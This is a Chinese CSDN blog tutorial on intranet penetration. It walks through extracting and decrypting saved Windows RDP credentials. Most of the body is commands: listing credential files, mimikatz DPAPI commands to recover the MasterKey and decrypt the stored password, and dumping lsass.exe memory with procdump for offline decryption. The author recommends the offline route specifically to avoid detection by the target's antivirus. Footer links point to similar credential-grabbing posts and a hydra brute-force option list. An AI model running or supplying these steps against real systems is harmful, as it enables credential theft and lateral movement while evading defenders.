内网渗透-Windows RDP凭证的抓取和密码破解测试的方法

最新推荐文章于 2024-05-15 18:18:40 发布
最新推荐文章于 2024-05-15 18:18:40 发布
阅读量918 收藏 8
点赞数 20
分类专栏: 内网渗透实战 文章标签: 安全性测试 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/137749342
版权

Windows RDP凭证的抓取和密码破解测试的方法

文章目录

破解原理

Credentials的解密是Windows系统信息收集中非常重要的一环,其中包括各类敏感、重要的凭证 (这个可以理解为密码) , 接下来我们就讲解RDP凭证的抓取和破解。

在我们点击保存密码后,Windows就通过MasterKey将我们的密码加密后保存在本地, 由于Windows还需要解密从而使用,所以这个过程是可逆,也正因为这一缘由,我们只要拿到MasterKey就能将密码解出来。在这里插入图片描述

凭证的查看

查看凭证命令

查看mstsc的连接记录
cmdkey /list
查找本地的Credentials
dir /a %userprofile%\appdata\local\microsoft\credentials*

在这里插入图片描述

在这里插入图片描述

在线破解

1、使用mimikatz获取该文件的MasterKey的guid

mimikatz dpapi::cred
/in:C:\Users\Administrator\appdata\local\microsoft\credentials\FF22A1FDA68FD8515B52C534E8655421

所以用于加密凭据文件FF22A1FDA68FD8515B52C534E8655421B的MasterKey的guid就是:{c271c658-e61b- 4023-95d2-dfbf18b0aa33},所以我们只要从内存中找到这个guid对应的MasterKey的值即可
在这里插入图片描述

2、找到内存中对应的MasterKey

mimikatz sekurlsa::dpapi

3、最后打开mimikatz通过MasterKey值去解密凭据文件
dpapi::cred /in:凭据文件路径 /masterky:masterkey值

mimikatz dpapi::cred
/in:C:\Users\Administrator\appdata\local\microsoft\credentials\FF22A1FDA68FD8515B52C534E8655421 /masterkey:b3354c56cd35630d10aa7477c3d16e9b94587f1dc6f9d0c8fcb72a5e4a25c8aab8fa242194666c4cc4be9 485c31af555b01a49abbfbb8cc1c00d209da624f33c

离线破解

由于我们不能保证我们的mimikatz是免杀状态,为了避免被对方发现,我们可以离线解密从而达到获取密码的目的其实很简单,就是把目标的文件和内存下载回来,在vps或本机上进行mimikatz解密即可。
1、下载目标内存
procdump.exe ‐accepteula ‐ma lsass.exe lsass1.dump 导出lsass

在这里插入图片描述
2、下载目标的Credentials文件
在这里插入图片描述
3、用mimikatz载入dump回来的内存
Sekurlsa::minidump lsass1.dump
在这里插入图片描述
4、获取Credentials的GUID
dpapi::cred /in:FF22A1FDA68FD8515B52C534E8655421
在这里插入图片描述
5、获取内存中所有的MasterKey
sekurlsa::dpapi

在这里插入图片描述
6、利用MasterKey解密

dpapi::cred /in:FF22A1FDA68FD8515B52C534E8655421
/masterkey:b3354c56cd35630d10aa7477c3d16e9b94587f1dc6f9d0c8fcb72a5e4a25c8aab8fa242194666c4cc4be9 485c31af555b01a49abbfbb8cc1c00d209da624f33c

在这里插入图片描述

炫彩@之星
关注
  • 20
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
内网渗透(二十八)之Windows协议认证和密码抓取-Windows RDP凭证抓取密码破解
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-15 397
Credentials的解密是Windows系统信息收集非常重要的一环,其包括各类敏感、重要的凭证(这个可以理解为密码),接下来我们就讲解RDP凭证抓取破解 在我们点击保存密码后,Windows就通过MasterKey将我们的密码加密后保存在本地,由于Windows还需要解密从而使用,所以这个过程是可逆,也正因为这一缘由,我们只要拿到MasterKey就能将密码解出来。
rdp文件密码的生成
06-02
rdp文件有一行密码说明,利用这个文件可以生成所需要的密码
利用mimikatz查看rdp连接密码【渗透测试】_mimikatz pth rdp
2401_84969443的博客
05-14 693
szDescription : 本地凭据数据。
RDP密码凭据抓取
最新发布
Y22Lee的博客
05-15 466
命令:dpapi::cred /in:凭据文件路径 /masterkey:masterkey值。
[内网]RDP远程桌面密码凭证获取
Keepb1ue的博客
05-15 1万+
通过密码文件获取guidMasterKey的值,根据guidMasterKey找到对应Masterkey通过Masterkey进行解密,获取明文。
获取RDP凭据密码
G3et的博客
02-06 1397
Windows 自带的远程桌面功能非常强大,并且被广泛使用。因此,获取远程桌面凭证可以为渗透测试的横向移动提供有利条件。横向移动是指在已经渗透到网络内部的情况下,继续在网络内部渗透的过程。通过获取远程桌面凭证,攻击者可以在网络内部移动,以获取更高的权限和更多的系统访问权限。所以,在渗透测试获取远程桌面凭证是一个很重要的步骤。如果用户在登录 RDP 时勾选了 “允许为我保存凭证” 选项,则在该用户本地将会生成一个凭证文件。
密码抓取--获取已控机器本地保存的RDP密码
网络安全。
02-24 1万+
0x01 简介 在获取内网机器管理员权限后,查看是否有保存到本地的RDP连接密码,对保存到本地的RDP连接密码进行解密,解密成功后可使用此凭据继续横向移动。 0x02 获取已控机器本地保存的RDP密码 一、mimikatz 1、查看本地机器本地连接过的目标机器。 reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Clie...
项目集和项目估算-RDP-GJB5000A
01-27
相信很多人对项目管理已经有相对比较深入的理解,且实际运用到日常科研创新项目的管理;但提起项目集管理,估计大部分就会有点茫然了,什么是项目集?如何有效管理? 其实,什么是项目集,业界相对通俗易懂的解释...
nvidia-opengl-rdp 英伟达显卡 rdp 远程桌面 OpenGL补丁
10-31
nvidia发布的 让windowsrdp远程桌面环境也可以使用 GrForce GPU来做终端桌面的OpenGL 加速补丁
基因测序数据库-16s-sliva-rdp库和minikraken库
12-15
基因测序数据库-16s-sliva-rdp库和minikraken库
RDP-OTP:Windows远程桌面的一次性密码身份验证
05-16
RDP OTP Windows远程桌面环境的一次性密码身份验证它是如何工作的? 每次登录到远程桌面环境时,密码都会自动更改。 然后,使用个人RSA密钥对的公共密钥对新密码进行加密。 密钥对的唯一用途是用于发送一次具有更高...
获取rdp保存的凭证
weixin_44747030的博客
12-23 1437
获取rdp保存的凭证
Windows10系统破解多用户同时远程登陆
u010483330的博客
07-26 8654
Windows10系统破解多用户同时远程登陆
windows密码获取凭证
weixin_67503304的博客
12-20 1794
简单讲述了windows密码获取凭证的几种常见方式方法
内网横向移动—Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取
剁椒鱼头没剁椒的博客
08-09 882
关于SSH的密钥问题,本来想着先把关于SSH密钥的破解以及横向移动方式总结出来的,但是网上关于Linux系统横向移动手法,以及利用都太少了,目前也没看到很好的文章,很多问题确实把相关知识点总结了,但是感觉还是有点乱,所以就先把Linux横向移动方式先暂停,暂时不去总结Linux方面的横向移动。不过关于Linux方面的横向移动还是可以带一下的,因为从系统角度来说,Linux横向移动的可利用方式确实少,正常情况下Linux系统利用多数都是利用Linux系统安装的间件软件等来实现横向移动。
内网渗透 | 最全的内网凭据密码收集方法和技巧总结
Ms08067安全实验室
02-03 6695
内网凭据密码收集指南原创投稿作者:深蓝实验室天威战队前言在攻防场景下,红队人员拿下一台终端或服务器后,第一步要做的往往就是信息收集,为最大化利用权限,扩大战果,密码抓取必不可少,这里针对常见应用软件和系统等密码抓取做了记录和总结,希望能帮助你作为参考。RDP凭证本机RDP密码抓取本机RDP密码是一个我们常遇到的场景,通常使用mimikatz抓取RDP密码。当系统为win10或2012R2以上时,默...
利用mimikatz查看rdp连接密码【渗透测试
热门推荐
leeezp的博客
09-22 29万+
在使用 rdp 时会发现系统有保存连接密码的功能,一定在本地以一种加密方式保存,在连接的时候解密进行rdp尝试,那么我们能不能那到加密的密码解密以获取这台机器rdp连接过的机器呢?UserName就是账户,CredentialBlob 字段值是解密后的密码,如果是空,就尝试 Credentials 目录下其他凭据的值。(毕竟渗透也是个苦力活...)可以保存rdp凭据,ssh凭据等连接凭据。接下来就一个一个实验吧,因为这个下面是凭据的值,不一定哪一个是你要的,需要写工具批量查喽。
hydra(九头蛇)暴力破解
weixin_42478365的博客
02-05 2216
暴力破解: hydra(九头蛇) 参数: -R 继续从上一次进度接着破解 -S 大写,采用SSL链接 -s 小写,可通过这个参数指定非默认端口 -l 指定破解的用户,对特定用户破解 -L 指定用户名字典 -p 小写,指定密码破解,少用,一般是采用密码字典 -P 大写,指定密码字典 -e 可选选项,n:空密码试探,s:使用指定用户和密码试探 -C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数 -M 指定目标列表文件一行一条 -o 指定结果输出文件 -f 在使用-M参数以后,找到第一对登录名或者密
nvidia-opengl-rdp
09-07
nvidia-opengl-rdp是指NVIDIA的OpenGL远程显示协议。它是一种用于在远程显示设备上渲染OpenGL图形的通信协议。 在传统的图形渲染,图形处理单元(GPU)将图形数据生成为图像,并将其发送到显示设备进行显示。然而,当我们需要在远程设备上进行图形渲染时,这样的传统渲染方法就不再适用。 nvidia-opengl-rdp通过使用网络进行通信,将图形渲染任务从本地GPU转移到远程显示设备的GPU上。这就意味着我们可以在本地设备上操作图形渲染任务,而实际的渲染工作将在远程设备上进行,最终将图像数据传输回本地设备进行显示。这种方法能够极大地提高远程设备上的图形渲染性能,同时减轻本地设备的负担。 使用nvidia-opengl-rdp的好处之一是它可以在不同操作系统之间进行跨平台渲染。无论是在Windows、Linux还是其他操作系统上,只要支持OpenGL协议,就可以使用nvidia-opengl-rdp进行远程图形渲染,这为多平台应用程序的开发提供了便利。 总的来说,nvidia-opengl-rdp是一种用于在远程设备上进行OpenGL图形渲染的通信协议,它通过网络传输图形数据,以实现在不同操作系统之间进行跨平台渲染。它的使用可以极大地提高远程设备上的图形渲染性能,并为多平台应用程序的开发提供便利。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值